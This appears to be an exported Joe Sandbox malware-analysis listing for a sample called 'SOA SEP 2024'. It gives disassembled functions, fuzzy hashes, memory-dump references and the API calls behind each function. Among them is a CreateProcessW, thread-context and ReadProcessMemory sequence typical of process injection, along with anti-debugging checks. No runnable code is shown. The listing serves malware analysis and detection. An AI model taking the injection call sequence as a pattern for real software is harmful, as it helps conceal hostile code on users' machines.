Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 5e4995017bcd8a7e61a0b6f409808b359d2bc0f4439aba862b3970481d5e1493
Instruction ID: 259bd040b08acc8386be6265ccb80079423845e6ca4cee5fc610b2756b8184c1
Opcode Fuzzy Hash: 5e4995017bcd8a7e61a0b6f409808b359d2bc0f4439aba862b3970481d5e1493
Instruction Fuzzy Hash: A101B9353C5211DAE6253B3CDC4EA2A334C9F81B68F614125F5069B192DFFCED418760

Function 007AC6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,007AC385,?,?,?,?,?,00000004), ref: 007AC6F2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,007AC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 007AC708
CloseHandle.KERNEL32(00000000,?,007AC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007AC70F

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: ee551b23453e02cfe3103fdd8cb462801f784323a39785353473dc5a37fe8580
Instruction ID: e0039aeeae88380a5711e8c8388ee506e737833dadf705a2f145a97c80083fb8
Opcode Fuzzy Hash: ee551b23453e02cfe3103fdd8cb462801f784323a39785353473dc5a37fe8580
Instruction Fuzzy Hash: ECE08632141218BBDB311B54AC49FCA7B18AB09760F108210FB146D0E097B62911879C

Function 007ABB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 007ABB72

Part of subcall function 00781C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00787A85), ref: 00781CB1
Part of subcall function 00781C9D: GetLastError.KERNEL32(00000000,?,00787A85), ref: 00781CC3

_free.LIBCMT ref: 007ABB83
_free.LIBCMT ref: 007ABB95

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
Instruction ID: 2129f76803f7335f43fffc7fab0d7c4062aaa651d614302275f7492052ecc906
Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
Instruction Fuzzy Hash: 8EE012E1681741C6DA2475796E48EB313CC4F45351754091DB459E7147DF2CE8418AB4

Function 00762322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 007622A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,007624F1), ref: 00762303

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 007625A1
CoInitialize.OLE32(00000000), ref: 00762618
CloseHandle.KERNEL32(00000000), ref: 007D503A

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 3815369404-0
Opcode ID: 446d84d22c649faccbf87673e6aa8e47ee7a616dc4cc0bedf66e33bfc6a94853
Instruction ID: 5eb580df81be72c8d560f5b45b5cb30373b8714c6bb7566975091d70e50ec876
Opcode Fuzzy Hash: 446d84d22c649faccbf87673e6aa8e47ee7a616dc4cc0bedf66e33bfc6a94853
Instruction Fuzzy Hash: DC71C2B4901285CACF24EF5AA99C495BBA5FB783407B0C16EE60AC77B2CB384456CF15

Function 007ABBE8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 007ABC18

Strings

EA06, xrefs: 007ABC46

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: 7c27a79f67136dc7ccf727c914b9f283877fb73691f7add5845734f153e69c9d
Instruction ID: 76eeb19cc2f1c30d6e20a700870aeeb8fcc7992d8a351b8f11261e51eca8e179
Opcode Fuzzy Hash: 7c27a79f67136dc7ccf727c914b9f283877fb73691f7add5845734f153e69c9d
Instruction Fuzzy Hash: 2101F971904218BEDB18D798C81AFED7FF89B05301F00455AF152D6181E5B8A7048B70

Function 00788E63 Relevance: 3.1, APIs: 2, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00787C0E: __getptd_noexit.LIBCMT ref: 00787C0E

__getbuf.LIBCMT ref: 00788EFA
__lseeki64.LIBCMT ref: 00788F6A

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: __getbuf__getptd_noexit__lseeki64
String ID:
API String ID: 3311320906-0
Opcode ID: b9289c8cb29eea4b9eeab7f253cfea821a09f55ca0fb0211559511bde46f2570
Instruction ID: cfcc20bd59dd460807f6c9c9cfe6c89a56302afcd51ee3438ad2786f37ae9837
Opcode Fuzzy Hash: b9289c8cb29eea4b9eeab7f253cfea821a09f55ca0fb0211559511bde46f2570
Instruction Fuzzy Hash: DC411171180A019FD368BF29C845A7A77A6AF44330F54861DF6AA8B2D1DB7CDC408B52

Function 00763A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00763A73

Part of subcall function 00781405: __lock.LIBCMT ref: 0078140B

Part of subcall function 00763ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00763AF3
Part of subcall function 00763ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00763B08

Part of subcall function 00763D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00763AA3,?), ref: 00763D45
Part of subcall function 00763D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00763AA3,?), ref: 00763D57
Part of subcall function 00763D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00821148,00821130,?,?,?,?,00763AA3,?), ref: 00763DC8
Part of subcall function 00763D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00763AA3,?), ref: 00763E48

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00763AB3

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
String ID:
API String ID: 924797094-0
Opcode ID: abce33b641c242e6f1334dcc3a2fe7badb75b748f5b073ef5b1c9ba06785048d
Instruction ID: 329fc49bcddba3dc2dfdc254d82c5d96b615e8f2e9e1ccf778a279bbd9d4796a
Opcode Fuzzy Hash: abce33b641c242e6f1334dcc3a2fe7badb75b748f5b073ef5b1c9ba06785048d
Instruction Fuzzy Hash: 1411C0B1904340DBC710EF65EC4990AFBE8FBA4350F10C91EF489872A1DB749652CF92

Function 0078E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 0078EA29
__close_nolock.LIBCMT ref: 0078EA42

Part of subcall function 00787BDA: __getptd_noexit.LIBCMT ref: 00787BDA

Part of subcall function 00787C0E: __getptd_noexit.LIBCMT ref: 00787C0E

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle__close_nolock
String ID:
API String ID: 1046115767-0
Opcode ID: c1e7bc678ed50be4b58602d1950fc35075d20a73a18d60a95d317938b2c2e63f
Instruction ID: 975fbbcdbd8bd72ec427fc05b8579190ead626800c581d6f0c7c4227385de84d
Opcode Fuzzy Hash: c1e7bc678ed50be4b58602d1950fc35075d20a73a18d60a95d317938b2c2e63f
Instruction Fuzzy Hash: FC117072885610DAD71ABF68C8493687E617F81732F268350E4715F1E3CBBC8841DBA2

Function 0077F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 0078395C: __FF_MSGBANNER.LIBCMT ref: 00783973
Part of subcall function 0078395C: __NMSG_WRITE.LIBCMT ref: 0078397A
Part of subcall function 0078395C: RtlAllocateHeap.NTDLL(00D20000,00000000,00000001,00000001,00000000,?,?,0077F507,?,0000000E), ref: 0078399F

std::exception::exception.LIBCMT ref: 0077F51E
__CxxThrowException@8.LIBCMT ref: 0077F533

Part of subcall function 00786805: RaiseException.KERNEL32(?,?,0000000E,00816A30,?,?,?,0077F538,0000000E,00816A30,?,00000001), ref: 00786856

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: bf84dd9df70c21e5f11f44fa7eb07b166a9666fd6a8bf42a4346dabd1bdf384f
Instruction ID: 9b940294d94ed84de072d9af933978a949f10598c53b930aef32cb55f4e19d8f
Opcode Fuzzy Hash: bf84dd9df70c21e5f11f44fa7eb07b166a9666fd6a8bf42a4346dabd1bdf384f
Instruction Fuzzy Hash: 4BF0AF3114425EA7DB14BFA9DE059DE77ECAF04394F608036F90CD2181DBB89B9087E6

Function 00783839 Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00783868
__lock_file.LIBCMT ref: 00783889

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 3b90ec3f18ddf1ea3f57d30c9edf7882c52c0db7e731547c5c9411e42b6c45fe
Instruction ID: f741b71f965d55dad867284c0c666e32fa39f130d576abceb1a86807685dc890
Opcode Fuzzy Hash: 3b90ec3f18ddf1ea3f57d30c9edf7882c52c0db7e731547c5c9411e42b6c45fe
Instruction Fuzzy Hash: 30018471980209FBCF22BFA8CC0989E7B61FF40721F148129F82457161D7798B61DBA1

Function 007835E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00787C0E: __getptd_noexit.LIBCMT ref: 00787C0E

__lock_file.LIBCMT ref: 00783629

Part of subcall function 00784E1C: __lock.LIBCMT ref: 00784E3F

__fclose_nolock.LIBCMT ref: 00783634

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 918dd32817591fbe938cbf0999ec5a102fb0030d43f33b0231cfbe16d91356ba
Instruction ID: 29b8d44b94052a2b619c22ddd5733f5249ba391fff53f5e32bcea60772e7af6d
Opcode Fuzzy Hash: 918dd32817591fbe938cbf0999ec5a102fb0030d43f33b0231cfbe16d91356ba
Instruction Fuzzy Hash: 1BF0B471AC1205FADB117F7DC80A76E7AA06F40B35F258149E421EB2D1DB7C8B01DB56

Function 00D6725D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00D67A8D
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D67AB1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D67AD3

Memory Dump Source

Source File: 00000000.00000002.2102902206.0000000000D66000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D66000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d66000_SOA SEP 2024.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction ID: f92c47e21f4e96e54fc07768e041a66fe65e4519a5943465b1e3c2225ef86104
Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction Fuzzy Hash: 0912CE24A18658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A

Function 00782957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 00782A0B

Part of subcall function 00787C0E: __getptd_noexit.LIBCMT ref: 00787C0E

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: __flush__getptd_noexit
String ID:
API String ID: 4101623367-0
Opcode ID: 604a52b038f9d89d146637e8f6a8a9ae492491e42f3dfb09f15d024a6db6c6d3
Instruction ID: 1c1938972cb4bfdc14acec147052461cab039e5104c73e035d23e22d0dc7d0fe
Opcode Fuzzy Hash: 604a52b038f9d89d146637e8f6a8a9ae492491e42f3dfb09f15d024a6db6c6d3
Instruction Fuzzy Hash: A14109707807069FDF2CAEA9C88056E77A6AF44362F24C53DEC55D7242EB78ED428B41

Function 0077ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0077EDC7

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 8e17dcd270b6efe67529c1d7827dc1f3516a3faec47c9e64d310e5865bd92721
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: BC31A274B001059BDB28DF58C490A69FBA6FB49380B64C6E5E40DCB266DB35EDD1CB90

Function 0078ED06 Relevance: 1.6, APIs: 1, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: __getptd_noexit
String ID:
API String ID: 3074181302-0
Opcode ID: 033bb54f4f156fb3b8b10d9589ad75cd0e2670690f1d7ced964abe27fa0f568b
Instruction ID: a90024b03d3fd4ea7eee4860adc149529b4bb0a567be9e5712033f97a00b1d1b
Opcode Fuzzy Hash: 033bb54f4f156fb3b8b10d9589ad75cd0e2670690f1d7ced964abe27fa0f568b
Instruction Fuzzy Hash: C2216DB2984600DFE7267FA8C8497583AA1AF42336F264640E4714B1E2DBBCC844DBB1

Function 007641A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00764214: FreeLibrary.KERNEL32(00000000,?), ref: 00764247

LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,007639FE,?,00000001), ref: 007641DB

Part of subcall function 00764291: FreeLibrary.KERNEL32(00000000), ref: 007642C4

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Library$Free$Load
String ID:
API String ID: 2391024519-0
Opcode ID: 3b1375d329234f3df08203312c11c624908a1828ae7c19174e4e7eead3035290
Instruction ID: 98338ae515b7e3f2b34e649e28e3a6c7d17dfaf3d2238672d99652bf12a1b532
Opcode Fuzzy Hash: 3b1375d329234f3df08203312c11c624908a1828ae7c19174e4e7eead3035290
Instruction Fuzzy Hash: DA11A771600305EFDB14BB74DC1AF9E77A9AF40704F208429FD97A61D1DE789E409B60

Function 0078AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 0078AFC0

Part of subcall function 00787BDA: __getptd_noexit.LIBCMT ref: 00787BDA

Part of subcall function 00787C0E: __getptd_noexit.LIBCMT ref: 00787C0E

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle
String ID:
API String ID: 1144279405-0
Opcode ID: c75cca31d09e1f5113158ccf63832b5e8a961fbb96632cf7fc04eedf9680d4de
Instruction ID: ce6ca08fcdf525b64cfbcf58e3516dae299f438bb9012996991cf52dd43e2ac1
Opcode Fuzzy Hash: c75cca31d09e1f5113158ccf63832b5e8a961fbb96632cf7fc04eedf9680d4de
Instruction Fuzzy Hash: 1511BFB2884600EFD7167FA4C84A75D3A61AF41332F264240E4315F1E2D7BCCD41DBA2

Function 007639DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
Instruction ID: e55577118063b2bb279bcb77f7b8e4f8b7c54edb116d0aa1bc464e21ea31c69d
Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
Instruction Fuzzy Hash: 7E01367150010DEECF05EFA4C8958EEBB74AF21344F108166B966971A6EA349A4ADB60

Function 00782AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00782AED

Part of subcall function 00787C0E: __getptd_noexit.LIBCMT ref: 00787C0E

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 544f698a991a43e8d8ecc1a6c23a73780145deab0f1908eff0afe5dcc37a1559
Instruction ID: d88cc00fd3382f89bc20af5f552aff8ea2e2da446d662f30a1ccc58dd0465d85
Opcode Fuzzy Hash: 544f698a991a43e8d8ecc1a6c23a73780145deab0f1908eff0afe5dcc37a1559
Instruction Fuzzy Hash: 48F06231580205FADF25BF648C0A79F3AA5BF00722F158455F8149B192D77C8A53DB52

Function 00764252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,?,?,007639FE,?,00000001), ref: 00764286

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
